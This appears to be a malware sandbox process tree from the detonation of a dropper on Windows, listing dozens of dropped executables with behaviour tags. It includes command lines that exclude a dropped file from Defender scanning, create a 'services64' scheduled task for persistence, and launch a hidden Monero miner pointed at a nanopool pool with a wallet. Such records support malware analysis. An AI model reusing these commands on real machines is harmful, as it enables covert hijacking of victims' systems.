                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe" -Force
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:6912
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 2468
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                          PID:3348
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\SGQDazRjK3dj9h5PYpsGlAad.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\SGQDazRjK3dj9h5PYpsGlAad.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:6476
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\iHWTBUxIpQQ2V0wNGbIoQRfC.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\iHWTBUxIpQQ2V0wNGbIoQRfC.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:6452
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:6540
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                          PID:1904
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\B6nS5AmiDzBtFr8R73VmDVKW.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\B6nS5AmiDzBtFr8R73VmDVKW.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:7016
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4866014.scr
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4866014.scr" /S
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:6668
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7641623.scr
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7641623.scr" /S
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:6500
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6482018.scr
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6482018.scr" /S
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                PID:5844
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8270222.scr
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8270222.scr" /S
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                PID:5056
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8104654.scr
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8104654.scr" /S
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:6176
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209b3da1556b9a317.exe
                                                                                                                                                                                                                                                                                Mon209b3da1556b9a317.exe
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:1192
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  PID:3976
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:4264
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:1044
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 240
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:4692
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2512986.scr
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2512986.scr" /S
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8167987.scr
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8167987.scr" /S
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                      PID:5920
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1092981.scr
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1092981.scr" /S
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                      PID:1512
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7365935.scr
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7365935.scr" /S
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                      PID:5636
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5472694.scr
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5472694.scr" /S
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:1652
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:5888
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 244
                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                          PID:3984
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:5568
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3Q2A4.tmp\setup.tmp
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-3Q2A4.tmp\setup.tmp" /SL5="$601FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:5848
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:1528
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-SV2IC.tmp\setup.tmp
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-SV2IC.tmp\setup.tmp" /SL5="$3026A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                              PID:5720
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-EIMN7.tmp\postback.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-EIMN7.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:2164
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:5748
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                            PID:7124
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:5180
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                            PID:6760
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                PID:7080
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                  PID:7396
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                    PID:7368
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:2796
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                                                              Mon20b6f9d5bd03a305.exe
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:1268
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:2232
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon2083f8d8970a0b2d.exe
                                                                                                                                                                                                                                                                                                Mon2083f8d8970a0b2d.exe
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:2008
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 324
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                  PID:5308
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                              PID:4760
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:3824
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4288
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:904
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                                                            Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                            PID:3168
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1378103.scr
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1378103.scr" /S
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              PID:3108
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2303097.scr
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2303097.scr" /S
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              PID:4852
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6821963.scr
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6821963.scr" /S
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                              PID:1492
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:6052
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7406868.scr
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7406868.scr" /S
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              PID:4120
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2912 -ip 2912
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                            PID:1692
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2008 -ip 2008
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                            PID:3724
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2200 -ip 2200
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                            PID:1100
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:5560
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 448
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                              PID:5840
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                            PID:5508
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\WaaSMedicAgent.exe 2306010a9752f376cff4bbee56aa08eb c4QZvIvDlEangE8xJGiw+w.0.1.0.3.0
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                            PID:5792
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5560 -ip 5560
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5732
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              PID:2216
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3504 -ip 3504
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:5468
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1044 -ip 1044
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                PID:5012
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                PID:5252
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5388 -ip 5388
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                PID:6700
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1176 -ip 1176
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                PID:6820
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5888 -ip 5888
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:7036
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5916
                                                                                                                                                                                                                                                                                                    • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                      PID:7036
                                                                                                                                                                                                                                                                                                    • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5652 -ip 5652
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:5908
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5588 -ip 5588
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                        PID:2900
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                        PID:6964
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5496 -ip 5496
